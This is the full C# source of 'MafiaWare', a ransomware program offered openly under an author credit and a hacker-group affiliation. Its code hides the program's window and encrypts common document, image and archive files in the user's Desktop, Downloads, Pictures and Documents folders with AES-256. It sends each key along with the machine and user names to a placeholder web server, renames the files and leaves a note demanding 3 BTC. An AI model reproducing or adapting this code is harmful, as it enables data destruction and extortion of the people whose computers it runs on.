MafiaWare Ransomware

1. /*
2.  *
3.  * MAFIAWARE
4.  * Algorithm from HT, with C Sources
5.  * Encrypt with AES256
6.  * Coded By Cyberking
7.  * email : cyberking@outlook.co.id
8.  * Mafia Blackhat - Indonesian BlackHat - Indonesian Backtrack Team
9.  * https://stillblackhat.id
10.  *
11.  */
12.  
13. using System;
14. using System.Diagnostics;
15. using System.Collections.Generic;
16. using System.ComponentModel;
17. using System.Data;
18. using System.Drawing;
19. using System.Linq;
20. using System.Text;
21. using System.Threading.Tasks;
22. using System.Windows.Forms;
23. using System.Security;
24. using System.Security.Cryptography;
25. using System.IO;
26. using System.Net;
27. using Microsoft.Win32;
28. using System.Runtime.InteropServices;
29. using System.Text.RegularExpressions;
30. namespace mafiaware {
31. public partial class Form1 : Form {
32. //Web untuk Password Unlock nya
33. string webPass = "https://yourweb.com/cyberking/w00t.php?g0ttrap=";
34. string namaUser = Environment.UserName;
35. string namaKompi = System.Environment.MachineName.ToString();
36. string dirUsr = "C:\\Users\\";
37. public Form1() {
38. InitializeComponent();
39. }
40. private void Form1_Load(object sender, EventArgs e) {
41. Opacity = 0;
42. this.ShowInTaskbar = false;
43. ngeEnrypt(); //mulai ngencrypt nya pas loading
44. ngeEnrypt2();
45. ngeEnrypt3();
46. ngeEnrypt4();
47. }
48. private void Form_Shown(object sender, EventArgs e) {
49. Visible = false;
50. Opacity = 100;
51. }
52. //Algo encrypt AES256
53. public byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes) {
54. byte[] encryptedBytes = null;
55. byte[] saltBytes = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8 };
56. using (MemoryStream ms = new MemoryStream()) {
57. using (RijndaelManaged AES = new RijndaelManaged()) {
58. AES.KeySize = 256;
59. AES.BlockSize = 128;
60. var key = new Rfc2898DeriveBytes(passwordBytes, saltBytes, 1000);
61. AES.Key = key.GetBytes(AES.KeySize / 8);
62. AES.IV = key.GetBytes(AES.BlockSize / 8);
63. AES.Mode = CipherMode.CBC;
64. using (var cs = new CryptoStream(ms, AES.CreateEncryptor(), CryptoStreamMode.Write)) {
65. cs.Write(bytesToBeEncrypted, 0, bytesToBeEncrypted.Length);
66. cs.Close();
67. }
68. encryptedBytes = ms.ToArray();
69. }
70. }
71. return encryptedBytes;
72. }
73. //buat randompass encrypt
74. public string BuatPass(int length) {
75. const string valid = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=&?&/";
76. StringBuilder res = new StringBuilder();
77. Random rnd = new Random();
78. while (0 < length--){
79. res.Append(valid[rnd.Next(valid.Length)]);
80. }
81. return res.ToString();
82. }
83.  //ngirim pass hasil trap ke web
84. public void ngirimPass(string password){
85. string g0ttrap = namaKompi + "-" + namaUser + " " + password;
86. var fullUrl = webPass + g0ttrap;
87. var conent = new System.Net.WebClient().DownloadString(fullUrl);
88. }
89. //ngencrypt file
90. public void ngencryptFile(string file, string password) {
91. byte[] bytesToBeEncrypted = File.ReadAllBytes(file);
92. byte[] passwordBytes = Encoding.UTF8.GetBytes(password);
93. //ngehash pass dg sha256
94. passwordBytes = SHA256.Create().ComputeHash(passwordBytes);
95. byte[] bytesEncrypted = AES_Encrypt(bytesToBeEncrypted, passwordBytes);
96. File.WriteAllBytes(file, bytesEncrypted);
97. System.IO.File.Move(file, file+".Locked-Mafiaware"); //ekstensi hasil ngencrypt
98. }
99. //ngencrypt folder
100. public void ngencryptFolder(string location, string password) {
101. //ekstensi yang mau di encrypt
102. var validExtensions = new[] {
103. ".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd", ".zip", ".rar"
104. };
105.  
106. string[] files = Directory.GetFiles(location);
107. string[] childDirectories = Directory.GetDirectories(location);
108. for (int i = 0; i < files.Length; i++){
109. string extension = Path.GetExtension(files[i]);
110. if (validExtensions.Contains(extension))
111. {
112. ngencryptFile(files[i],password);
113. }
114. }
115. for (int i = 0; i < childDirectories.Length; i++){
116. ngencryptFolder(childDirectories[i],password);
117. }
118. }
119. public void ngeEnrypt() {
120. string password = BuatPass(15);
121. string path = "\\Desktop";
122. string startPath = dirUsr + namaUser + path;
123. ngirimPass(password);
124. ngencryptFolder(startPath,password);
125. pesanReadMe();
126. password = null;
127. System.Windows.Forms.Application.Exit();
128. }
129. public void ngeEnrypt2() {
130. string password = BuatPass(15);
131. string path = "\\Downloads";
132. string startPath = dirUsr + namaUser + path;
133. ngirimPass(password);
134. ngencryptFolder(startPath,password);
135. password = null;
136. System.Windows.Forms.Application.Exit();
137. }
138. public void ngeEnrypt3() {
139. string password = BuatPass(15);
140. string path = "\\Pictures";
141. string startPath = dirUsr + namaUser + path;
142. ngirimPass(password);
143. ngencryptFolder(startPath,password);
144. password = null;
145. System.Windows.Forms.Application.Exit();
146. }
147. public void ngeEnrypt4() {
148. string password = BuatPass(15);
149. string path = "\\Documents";
150. string startPath = dirUsr + namaUser + path;
151. ngirimPass(password);
152. ngencryptFolder(startPath,password);
153. password = null;
154. System.Windows.Forms.Application.Exit();
155. }
156. public void pesanReadMe() {
157. string path = "\\Desktop\\READ_ME.txt";
158. string fullpath = dirUsr + namaUser + path;
159. string[] lines = { "Cyberking was Encrypt your File with MafiaWare", "Send 3BTC, then Email me and meet me", "my email cyberking@indonesianbacktrack.or.id" };
160. System.IO.File.WriteAllLines(fullpath, lines);
161. }
162. }
163. }